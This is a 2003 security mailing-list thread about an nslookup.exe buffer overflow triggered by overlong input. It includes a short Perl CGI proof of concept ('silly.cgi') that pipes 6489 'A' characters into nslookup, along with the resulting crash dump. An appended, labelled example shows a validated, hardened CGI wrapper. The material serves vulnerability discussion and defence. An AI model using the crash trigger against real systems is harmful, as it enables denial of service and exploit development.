,_____________________________________________________,
\ Ryan Yagatich support (at) pantek (dot) com [email concealed] / Pantek Incorporated (877) LINUX-FIX /
\ http://www.pantek.com/security (440) 519-1802 / Are your networks secure? Are you certain? /
\___A4536371BF88C57DB181799D00BCA331E6AD909D297C3493___
On Thu, 20 Mar 2003, Blue Boar wrote:
>Patrick Webster wrote:
>> Can you do anything interesting with this?:
>>
>> C:\>nslookup
>> Default Server: dns.server.net
>> Address: 111.222.333.444
>>
>>
>>>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>>
>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>>
>> Gives error: memory can't be "read" - 0x414141 (aka A).
>
>If you have to manually type all the A's, then probably not. Maybe if
>someone did something silly like make a CGI script that calls nslookup.exe
>directly with user input.
>
>What OS are you testing on? It looks like it's fixed in XP:
>
>C:\winxp\system32>nslookup
>Default Server: dns1.snfcca.sbcglobal.net
>Address: 206.13.28.12
>
> >
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>*** Input is too long
> >
>
>
> BB
>
==begin silly.cgi
#!perl -w
use strict;
print "Content-type: text/html\n\n";
# Pipe straight into nslookup.exe's interactive prompt, the "silly CGI" case above.
open(NSLOOKUP,"|nslookup.exe") || die "Could not open nslookup.exe (path?)";
# 6489 bytes with no newline; close() flushes them and sends EOF.
print NSLOOKUP "A" x 6489;
close(NSLOOKUP);
==end silly.cgi
MSDE:
Unhandled exception at 0x01004d65 in NSLOOKUP.EXE: 0xC0000005: Access
violation writing location 0x0103e000.
01004D5D cmp esi,100F770h
01004D63 je 01004D6F
---> 01004D65 mov dword ptr [edi],esi
01004D67 add edi,4
01004D6A jmp 01004C37
01004D65 = 16797029
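Blue Boar's point in the quoted reply is that the crash only matters once something hands untrusted input to nslookup.exe for you. The following is an added example, not code from this thread or from Ryan, Patrick or Blue Boar, of what a CGI wrapper around nslookup.exe should do instead of silly.cgi: bound and validate the hostname before the tool ever sees it, and pass it as an argument rather than writing it to the interactive prompt. It assumes the standard CGI module is available, that nslookup.exe is on the PATH, and a made-up query parameter named `host`.

```perl
#!perl -w
# Added example (not from the original post): a CGI front end for nslookup.exe
# that refuses anything but a syntactically valid, length-bounded hostname.
use strict;
use CGI qw(param header);   # assumption: the CGI module is installed

# RFC 1035/1123 limits: whole name at most 253 characters, each label 1..63
# characters of letters, digits and hyphens, not starting or ending with '-'.
sub valid_hostname {
    my ($name) = @_;
    return 0 unless defined $name;
    return 0 if length($name) == 0 || length($name) > 253;
    # limit -1 keeps trailing empty fields, so "host." and "a..b" are rejected
    for my $label (split /\./, $name, -1) {
        return 0 unless $label =~ /^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$/;
    }
    return 1;
}

$| = 1;                      # flush the header before the child writes to stdout
my $host = param('host');    # 'host' is a made-up parameter name for this example
print header('text/plain');

if (!valid_hostname($host)) {
    print "rejected: not a valid hostname\n";
    exit 0;
}

# List-form system(): the hostname is one argv element, never shell-interpreted
# and never fed to the interactive prompt, so the long-stdin case cannot occur.
my $rc = system('nslookup.exe', $host);
print "nslookup.exe failed (exit status $rc)\n" if $rc != 0;
```

The length check alone already rules out the 6489-byte input from silly.cgi, but the character whitelist is what makes the list-form call safe on Windows, where Perl still has to join the arguments into a single command line for CreateProcess: with only letters, digits, hyphens and dots allowed, there is nothing left for that joining to misinterpret.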